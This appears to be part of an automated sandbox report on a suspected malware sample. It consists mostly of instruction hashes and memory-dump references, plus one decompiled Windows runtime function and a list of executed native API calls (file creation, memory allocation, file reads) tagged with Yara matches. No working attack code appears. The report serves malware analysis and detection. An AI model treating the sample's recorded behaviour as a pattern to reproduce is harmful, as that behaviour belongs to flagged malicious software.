                                                                      • Instruction Fuzzy Hash: 622104362046049FD709DF28C880FAABBA5EFC4750F04856DF9959B382D730ED09CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                      • Instruction ID: 9c4a673d9b63d4d14ac46ea5f709c2ed94f58ff2bbc9136011abbab54f3dae91
                                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                      • Instruction Fuzzy Hash: 6B215772606A85CFD726DB28CA44B6537F8EF50340F1900A0EC04CB3A2E778DC80CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d193c8d5add1c992b3ead7f5584a5895ffaa51e87dc30d544ffa68bf414faf3
                                                                      • Instruction ID: 6970eaf349544b325df506a3d204d5412c53492a927769b96e23cf109b16cd25
                                                                      • Opcode Fuzzy Hash: 1d193c8d5add1c992b3ead7f5584a5895ffaa51e87dc30d544ffa68bf414faf3
                                                                      • Instruction Fuzzy Hash: E3219D72904604ABC725DF69DD84EABB7B9EF48340F108569F50ACB750D634E940CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77a1e4ac97dfa2036f5802892e3b4f2e553bbeb533677d950a8e11387180da49
                                                                      • Instruction ID: 8b866d3d488619673ccfff635b11cf6598fdd2210d051377e4d9c7cdb1e9cbea
                                                                      • Opcode Fuzzy Hash: 77a1e4ac97dfa2036f5802892e3b4f2e553bbeb533677d950a8e11387180da49
                                                                      • Instruction Fuzzy Hash: F821AF33A108159B9B19CF7DC805566F7E6EF9C31032A467FD812EB265EA70BD11C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                      • Instruction ID: 26d193ba0d4c5e295b33d15c4f99b5e4311b8d87ec18434ae55227ab07302c0c
                                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                      • Instruction Fuzzy Hash: 2B216872A00A54DFC731CF0DE640A66B7F5EB94B10F25857EE94A8BA21D731AC00DB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                      • Instruction ID: 7d4b1d46f2ad717ffe0569be40f7630a3cdafb0a6afe3719abf5c9f6c835aafc
                                                                      • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                      • Instruction Fuzzy Hash: AB216076E00119DBCB14CFA9C58069AF3F5FB88350FA64565ED59B7345CA30AE05CBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f9921fde79201742350e2a318571b87f2312b96965735bd97df8746c4d21d2a2
                                                                      • Instruction ID: 2be4d84c3574ba12a715b5302af24ba0f28fe90e32aae8e68fd65ae5f09be815
                                                                      • Opcode Fuzzy Hash: f9921fde79201742350e2a318571b87f2312b96965735bd97df8746c4d21d2a2
                                                                      • Instruction Fuzzy Hash: C5212532041645EFC722EF68CB41F6AB7B9FF08704F144568B14A9B6A2CB79E981CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b01713ad8fc9e8777bde73c80367851133f909e139fdc650eb839484fdd42066
                                                                      • Instruction ID: d236588bf9c6eb8f20dcf59135afb6e23e0e0d062b7e23fe821f70f3d591c274
                                                                      • Opcode Fuzzy Hash: b01713ad8fc9e8777bde73c80367851133f909e139fdc650eb839484fdd42066
                                                                      • Instruction Fuzzy Hash: FE116B373151209BCB29CB199E81A6B7366EBD5330B354139ED16DF780CE359C02C695
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 583099cea5a9dcec1b4e7fefc39030f914d7f1b67cd1d2fd8df0f0b7b1f63d2a
                                                                      • Instruction ID: 05ac5adb90356cf44b42195192d531e0511eb2f523ce4a09b43695f7ec8969ed
                                                                      • Opcode Fuzzy Hash: 583099cea5a9dcec1b4e7fefc39030f914d7f1b67cd1d2fd8df0f0b7b1f63d2a
                                                                      • Instruction Fuzzy Hash: 1CF0BEB29D56909FD731C728C244BA2BBEB9B057B8F55846BE40687642C7A4FCC0C254
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d34a1f41c8d1cd6004cc2eee5cdb2262489ce01a87e0384e6df40ad2aa395b9f
                                                                      • Instruction ID: d220379ef6031fda2311d82c8d0d29091c4f509450e93a7576fba80aab39f488
                                                                      • Opcode Fuzzy Hash: d34a1f41c8d1cd6004cc2eee5cdb2262489ce01a87e0384e6df40ad2aa395b9f
                                                                      • Instruction Fuzzy Hash: 3CF0E57A8151C68ADF36BB787A523E13F98D796354F190487E8941B243CD3C8C93CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56d8dafbd2b77213cb992f2a4105dcf0330436292c9e360424678a15d5763b2d
                                                                      • Instruction ID: e549e56ad6827ecb845e5adb0e5750a00add74d6f01c5c9b0642daaf8e2fed56
                                                                      • Opcode Fuzzy Hash: 56d8dafbd2b77213cb992f2a4105dcf0330436292c9e360424678a15d5763b2d
                                                                      • Instruction Fuzzy Hash: 48F03070E046489FDB14EBA8D546BAE77B4AF14700F508499F916AB291EA34D9018B54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                      • Instruction ID: c5a78448a132e3067dc1dde98637515b7705dd9112c346d4bc3cae60a4167648
                                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                      • Instruction Fuzzy Hash: 4DE02232340A002BE721AF4ACC81F8377ADEF82720F004078B9041F283CAE6DC088BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35ee0b0a91bdea5bad5d6c88c4508f85a4c1136f505d7b19aa774061063a927a
                                                                      • Instruction ID: 423f49d239937633d840660f2f754a04fd8c58cf49561b869b8e96d9c1018ec5
                                                                      • Opcode Fuzzy Hash: 35ee0b0a91bdea5bad5d6c88c4508f85a4c1136f505d7b19aa774061063a927a
                                                                      • Instruction Fuzzy Hash: F2F08270A04648AFCB04DBA8E946EAE77B4EF08300F100199F916EB2D1EA34D900C754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c4a0b86e66ad5593a4d8e445ebb028659a6fb15beb7598fd1f111454be8b4162
                                                                      • Instruction ID: 44797ad0fe091e9162ec7b794c956161c44e3411de268a73b9c8e15088bb9a87
                                                                      • Opcode Fuzzy Hash: c4a0b86e66ad5593a4d8e445ebb028659a6fb15beb7598fd1f111454be8b4162
                                                                      • Instruction Fuzzy Hash: 8CF0E234A0C244EACF029BA8C941BFEBBB1BF04310F142625E8E1AB1A1E7749C80C785
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a34b1347470ceb86cefc4a6cb52e66b4abd88f33212aae2835f95b024afec6f
                                                                      • Instruction ID: 24db0941b8072b1f63f132306e0c84deca0a6cc164352fc8d929ea13bb77f6b2
                                                                      • Opcode Fuzzy Hash: 7a34b1347470ceb86cefc4a6cb52e66b4abd88f33212aae2835f95b024afec6f
                                                                      • Instruction Fuzzy Hash: 64F0E272961684AFD770D758C2D0F23B7D4BF007B9F464865D80587A21C738ED88C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 50832c3ea60beeeca26dd4efa57b58a1550f8ba58e08ac46e0bc38deca85d842
                                                                      • Instruction ID: 86823c1b4d747309726082e3b44155011c1e98111b93cd19f4c9230cb87fe796
                                                                      • Opcode Fuzzy Hash: 50832c3ea60beeeca26dd4efa57b58a1550f8ba58e08ac46e0bc38deca85d842
                                                                      • Instruction Fuzzy Hash: 14F082B0A14258ABDB00EBA8DA07E6FB3B4FF04300F140459BA05DB391EB74DD00C794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5630761ad9dc1fb1c16aa2460273fe6d87fce2e5af4a25670c6feac5d081cb0f
                                                                      • Instruction ID: 7490f51f75265057b862658357678cf6293705f315f7e06b042d6ac90b85e981
                                                                      • Opcode Fuzzy Hash: 5630761ad9dc1fb1c16aa2460273fe6d87fce2e5af4a25670c6feac5d081cb0f
                                                                      • Instruction Fuzzy Hash: 4AE09272A01421ABD2119B58BD01F66B3ADDBE5755F198035F505C7220D668DD02C7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                      • Instruction ID: 603b03f0bc0091605cd56196430fa652bd5a2dccb66c129ef1644c9b6b005029
                                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                      • Instruction Fuzzy Hash: D6E0D833A4112CBBCB2196DD9E06FAABBBDDB48BA0F000175BA04D7150D570DD50C3D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 470bb9f2513694f441fb5981c827391ca07c0f8506d67f9f508989fcee646673
                                                                      • Instruction ID: ac509b0a866d85e7e2bcdb03696602c74efe4f261fdad391b8be5074fd4e36f7
                                                                      • Opcode Fuzzy Hash: 470bb9f2513694f441fb5981c827391ca07c0f8506d67f9f508989fcee646673
                                                                      • Instruction Fuzzy Hash: 9BE0DFB120D2099FD734DB51E140F2537A8AB52721F1A802EF00A5B982C6A1DC81C206
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c272c87a1ee2b6e0e9023c080b805149d298edd7cea4cbad61050bcf9599444
                                                                      • Instruction ID: eff6d8484e4cdeda41c29bfaed7cb630a31fee124d5f2b4aadb7d69f5d94a111
                                                                      • Opcode Fuzzy Hash: 2c272c87a1ee2b6e0e9023c080b805149d298edd7cea4cbad61050bcf9599444
                                                                      • Instruction Fuzzy Hash: 2AF03978812784DFCBA0EFE9DA4174836B4F788310F20412EE0098B2A5DB385486CF01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                      • Instruction ID: 7ec7db8207f6793df0f7bc9702da4c2470c8c9cb4b4700ed3f0cf80ee3120e81
                                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                      • Instruction Fuzzy Hash: 1BE08C31284208ABDB226A44CC01BA97A269B507A0F204031BE495FAE1C7719C91E6D4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1ae0d383bde81eb7215f126050152d18b4bb39fa24663b25d47aed6dea87b6d
                                                                      • Instruction ID: 3d2d7d3860ab83069b9e8d0b56b75a6785e3342130446b808e5433767ef88f96
                                                                      • Opcode Fuzzy Hash: b1ae0d383bde81eb7215f126050152d18b4bb39fa24663b25d47aed6dea87b6d
                                                                      • Instruction Fuzzy Hash: 86D05B6116109057DB1D5756AE65B253213E7B4764F304D3DF1074E5A1D970C8E5D209
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03a4045a3843f662610370e08545809903993b13983be73ad987d2155a524c78
                                                                      • Instruction ID: c1a56ebdccadc8e774680df734b4a09bacbf8b847d511ed089808417fd48e3ed
                                                                      • Opcode Fuzzy Hash: 03a4045a3843f662610370e08545809903993b13983be73ad987d2155a524c78
                                                                      • Instruction Fuzzy Hash: 7DD0A971200240A2DA2D5B19A905B193256EBE0B89F38087CF20B598C2CFA4CCA2E488
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                      • Instruction ID: ef6b838c647ea1695912fd155d4495d3cd1b6d30a4997560236a55ae704ef366
                                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                      • Instruction Fuzzy Hash: 92E0EC71A44A849BCF12EBA9CAA0F5EB7F5FB45B40F158454B4085F6B1C664AD00CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                      • Instruction ID: faefcbdead954625da165b7774bb651099f38919184d4cc246358ff50a91e8b1
                                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                      • Instruction Fuzzy Hash: 8ED0A9335011949EDF01EB18E21876833B3BB02308F682075904A0689AC33E4F0AE600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                      • Instruction ID: 1c049a51ba74e4d564553e5d25374279cc073146da7043ab8a89723582a5553f
                                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                      • Instruction Fuzzy Hash: 1BD0E935352A80CFD716CB5DD554B1573B4BB54B85FC50590E901CB762E67CDD84CA01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                      • Instruction ID: 3e2014e945458e39ce38765404405322eecf9a3b683f2f380f1b227478d4f870
                                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                      • Instruction Fuzzy Hash: 22C08C33180248BBCB126F81CD01F467F2AFB94B60F008010FA080B5B1CA3AE9B0EB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                      • Instruction ID: d84754c5290dbd4c931be3b64169d9835f0344970c9b94128e3fe25f6f719446
                                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                      • Instruction Fuzzy Hash: 53C08C70281A00AAEB221F20CE02F5076AABB01B06F4500A07300DA0F0DB78DC01E600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                      • Instruction ID: 8bfae83bf18869b3e49953ad24cae52b9e15ebb2ef80127fd7330b33de69a6fa
                                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                      • Instruction Fuzzy Hash: 0EC08C32080248BBC7126A45CE01F057B29E790B60F000020B6040A6A28932E8A0D588
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f3cbc885204d218efa5d19087c3b6f5be40dfd3ad1846483e64e07ee84dc36
                                                                      • Instruction ID: 4365318bbcec634f908b7ee491300083e6cb3d4e5336b5ec80b0b8fce1e2c39f
                                                                      • Opcode Fuzzy Hash: d8f3cbc885204d218efa5d19087c3b6f5be40dfd3ad1846483e64e07ee84dc36
                                                                      • Instruction Fuzzy Hash: 0490047530504443D340757D544CF070005D7D0345F51D031F10545D5DC775CC51F171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0db6a3fe53ef69997f0ad1dc32989f00e1b1d0bb1b9c004e022ebed83aec28d
                                                                      • Instruction ID: 0462f377e9076efbc1469e49279942be19fc086e479e1333778e28e1099be3b8
                                                                      • Opcode Fuzzy Hash: d0db6a3fe53ef69997f0ad1dc32989f00e1b1d0bb1b9c004e022ebed83aec28d
                                                                      • Instruction Fuzzy Hash: 8690027930504442D64065695844A87000597D0345F51D421A04145DCD86948861F161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 6f809e5f8a2415898a93a880bdf8bf5f36c4babdb3f16e144d061bc7f7a6759b
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00A8FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E00A3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E00A85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E00A85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}











                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A8FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A8FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A8FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,030B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030B820D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030A2D11,00002000,00003000,00000004), ref: 030B83D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(030B3D52,5E972F59,FFFFFFFF,030B3A11,?,?,030B3D52,?,030B3A11,FFFFFFFF,5E972F59,030B3D52,?,00000000), ref: 030B82B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(030B3D52,5E972F59,FFFFFFFF,030B3A11,?,?,030B3D52,?,030B3A11,FFFFFFFF,5E972F59,030B3D52,?,00000000), ref: 030B82B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030A2D11,00002000,00003000,00000004), ref: 030B83D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

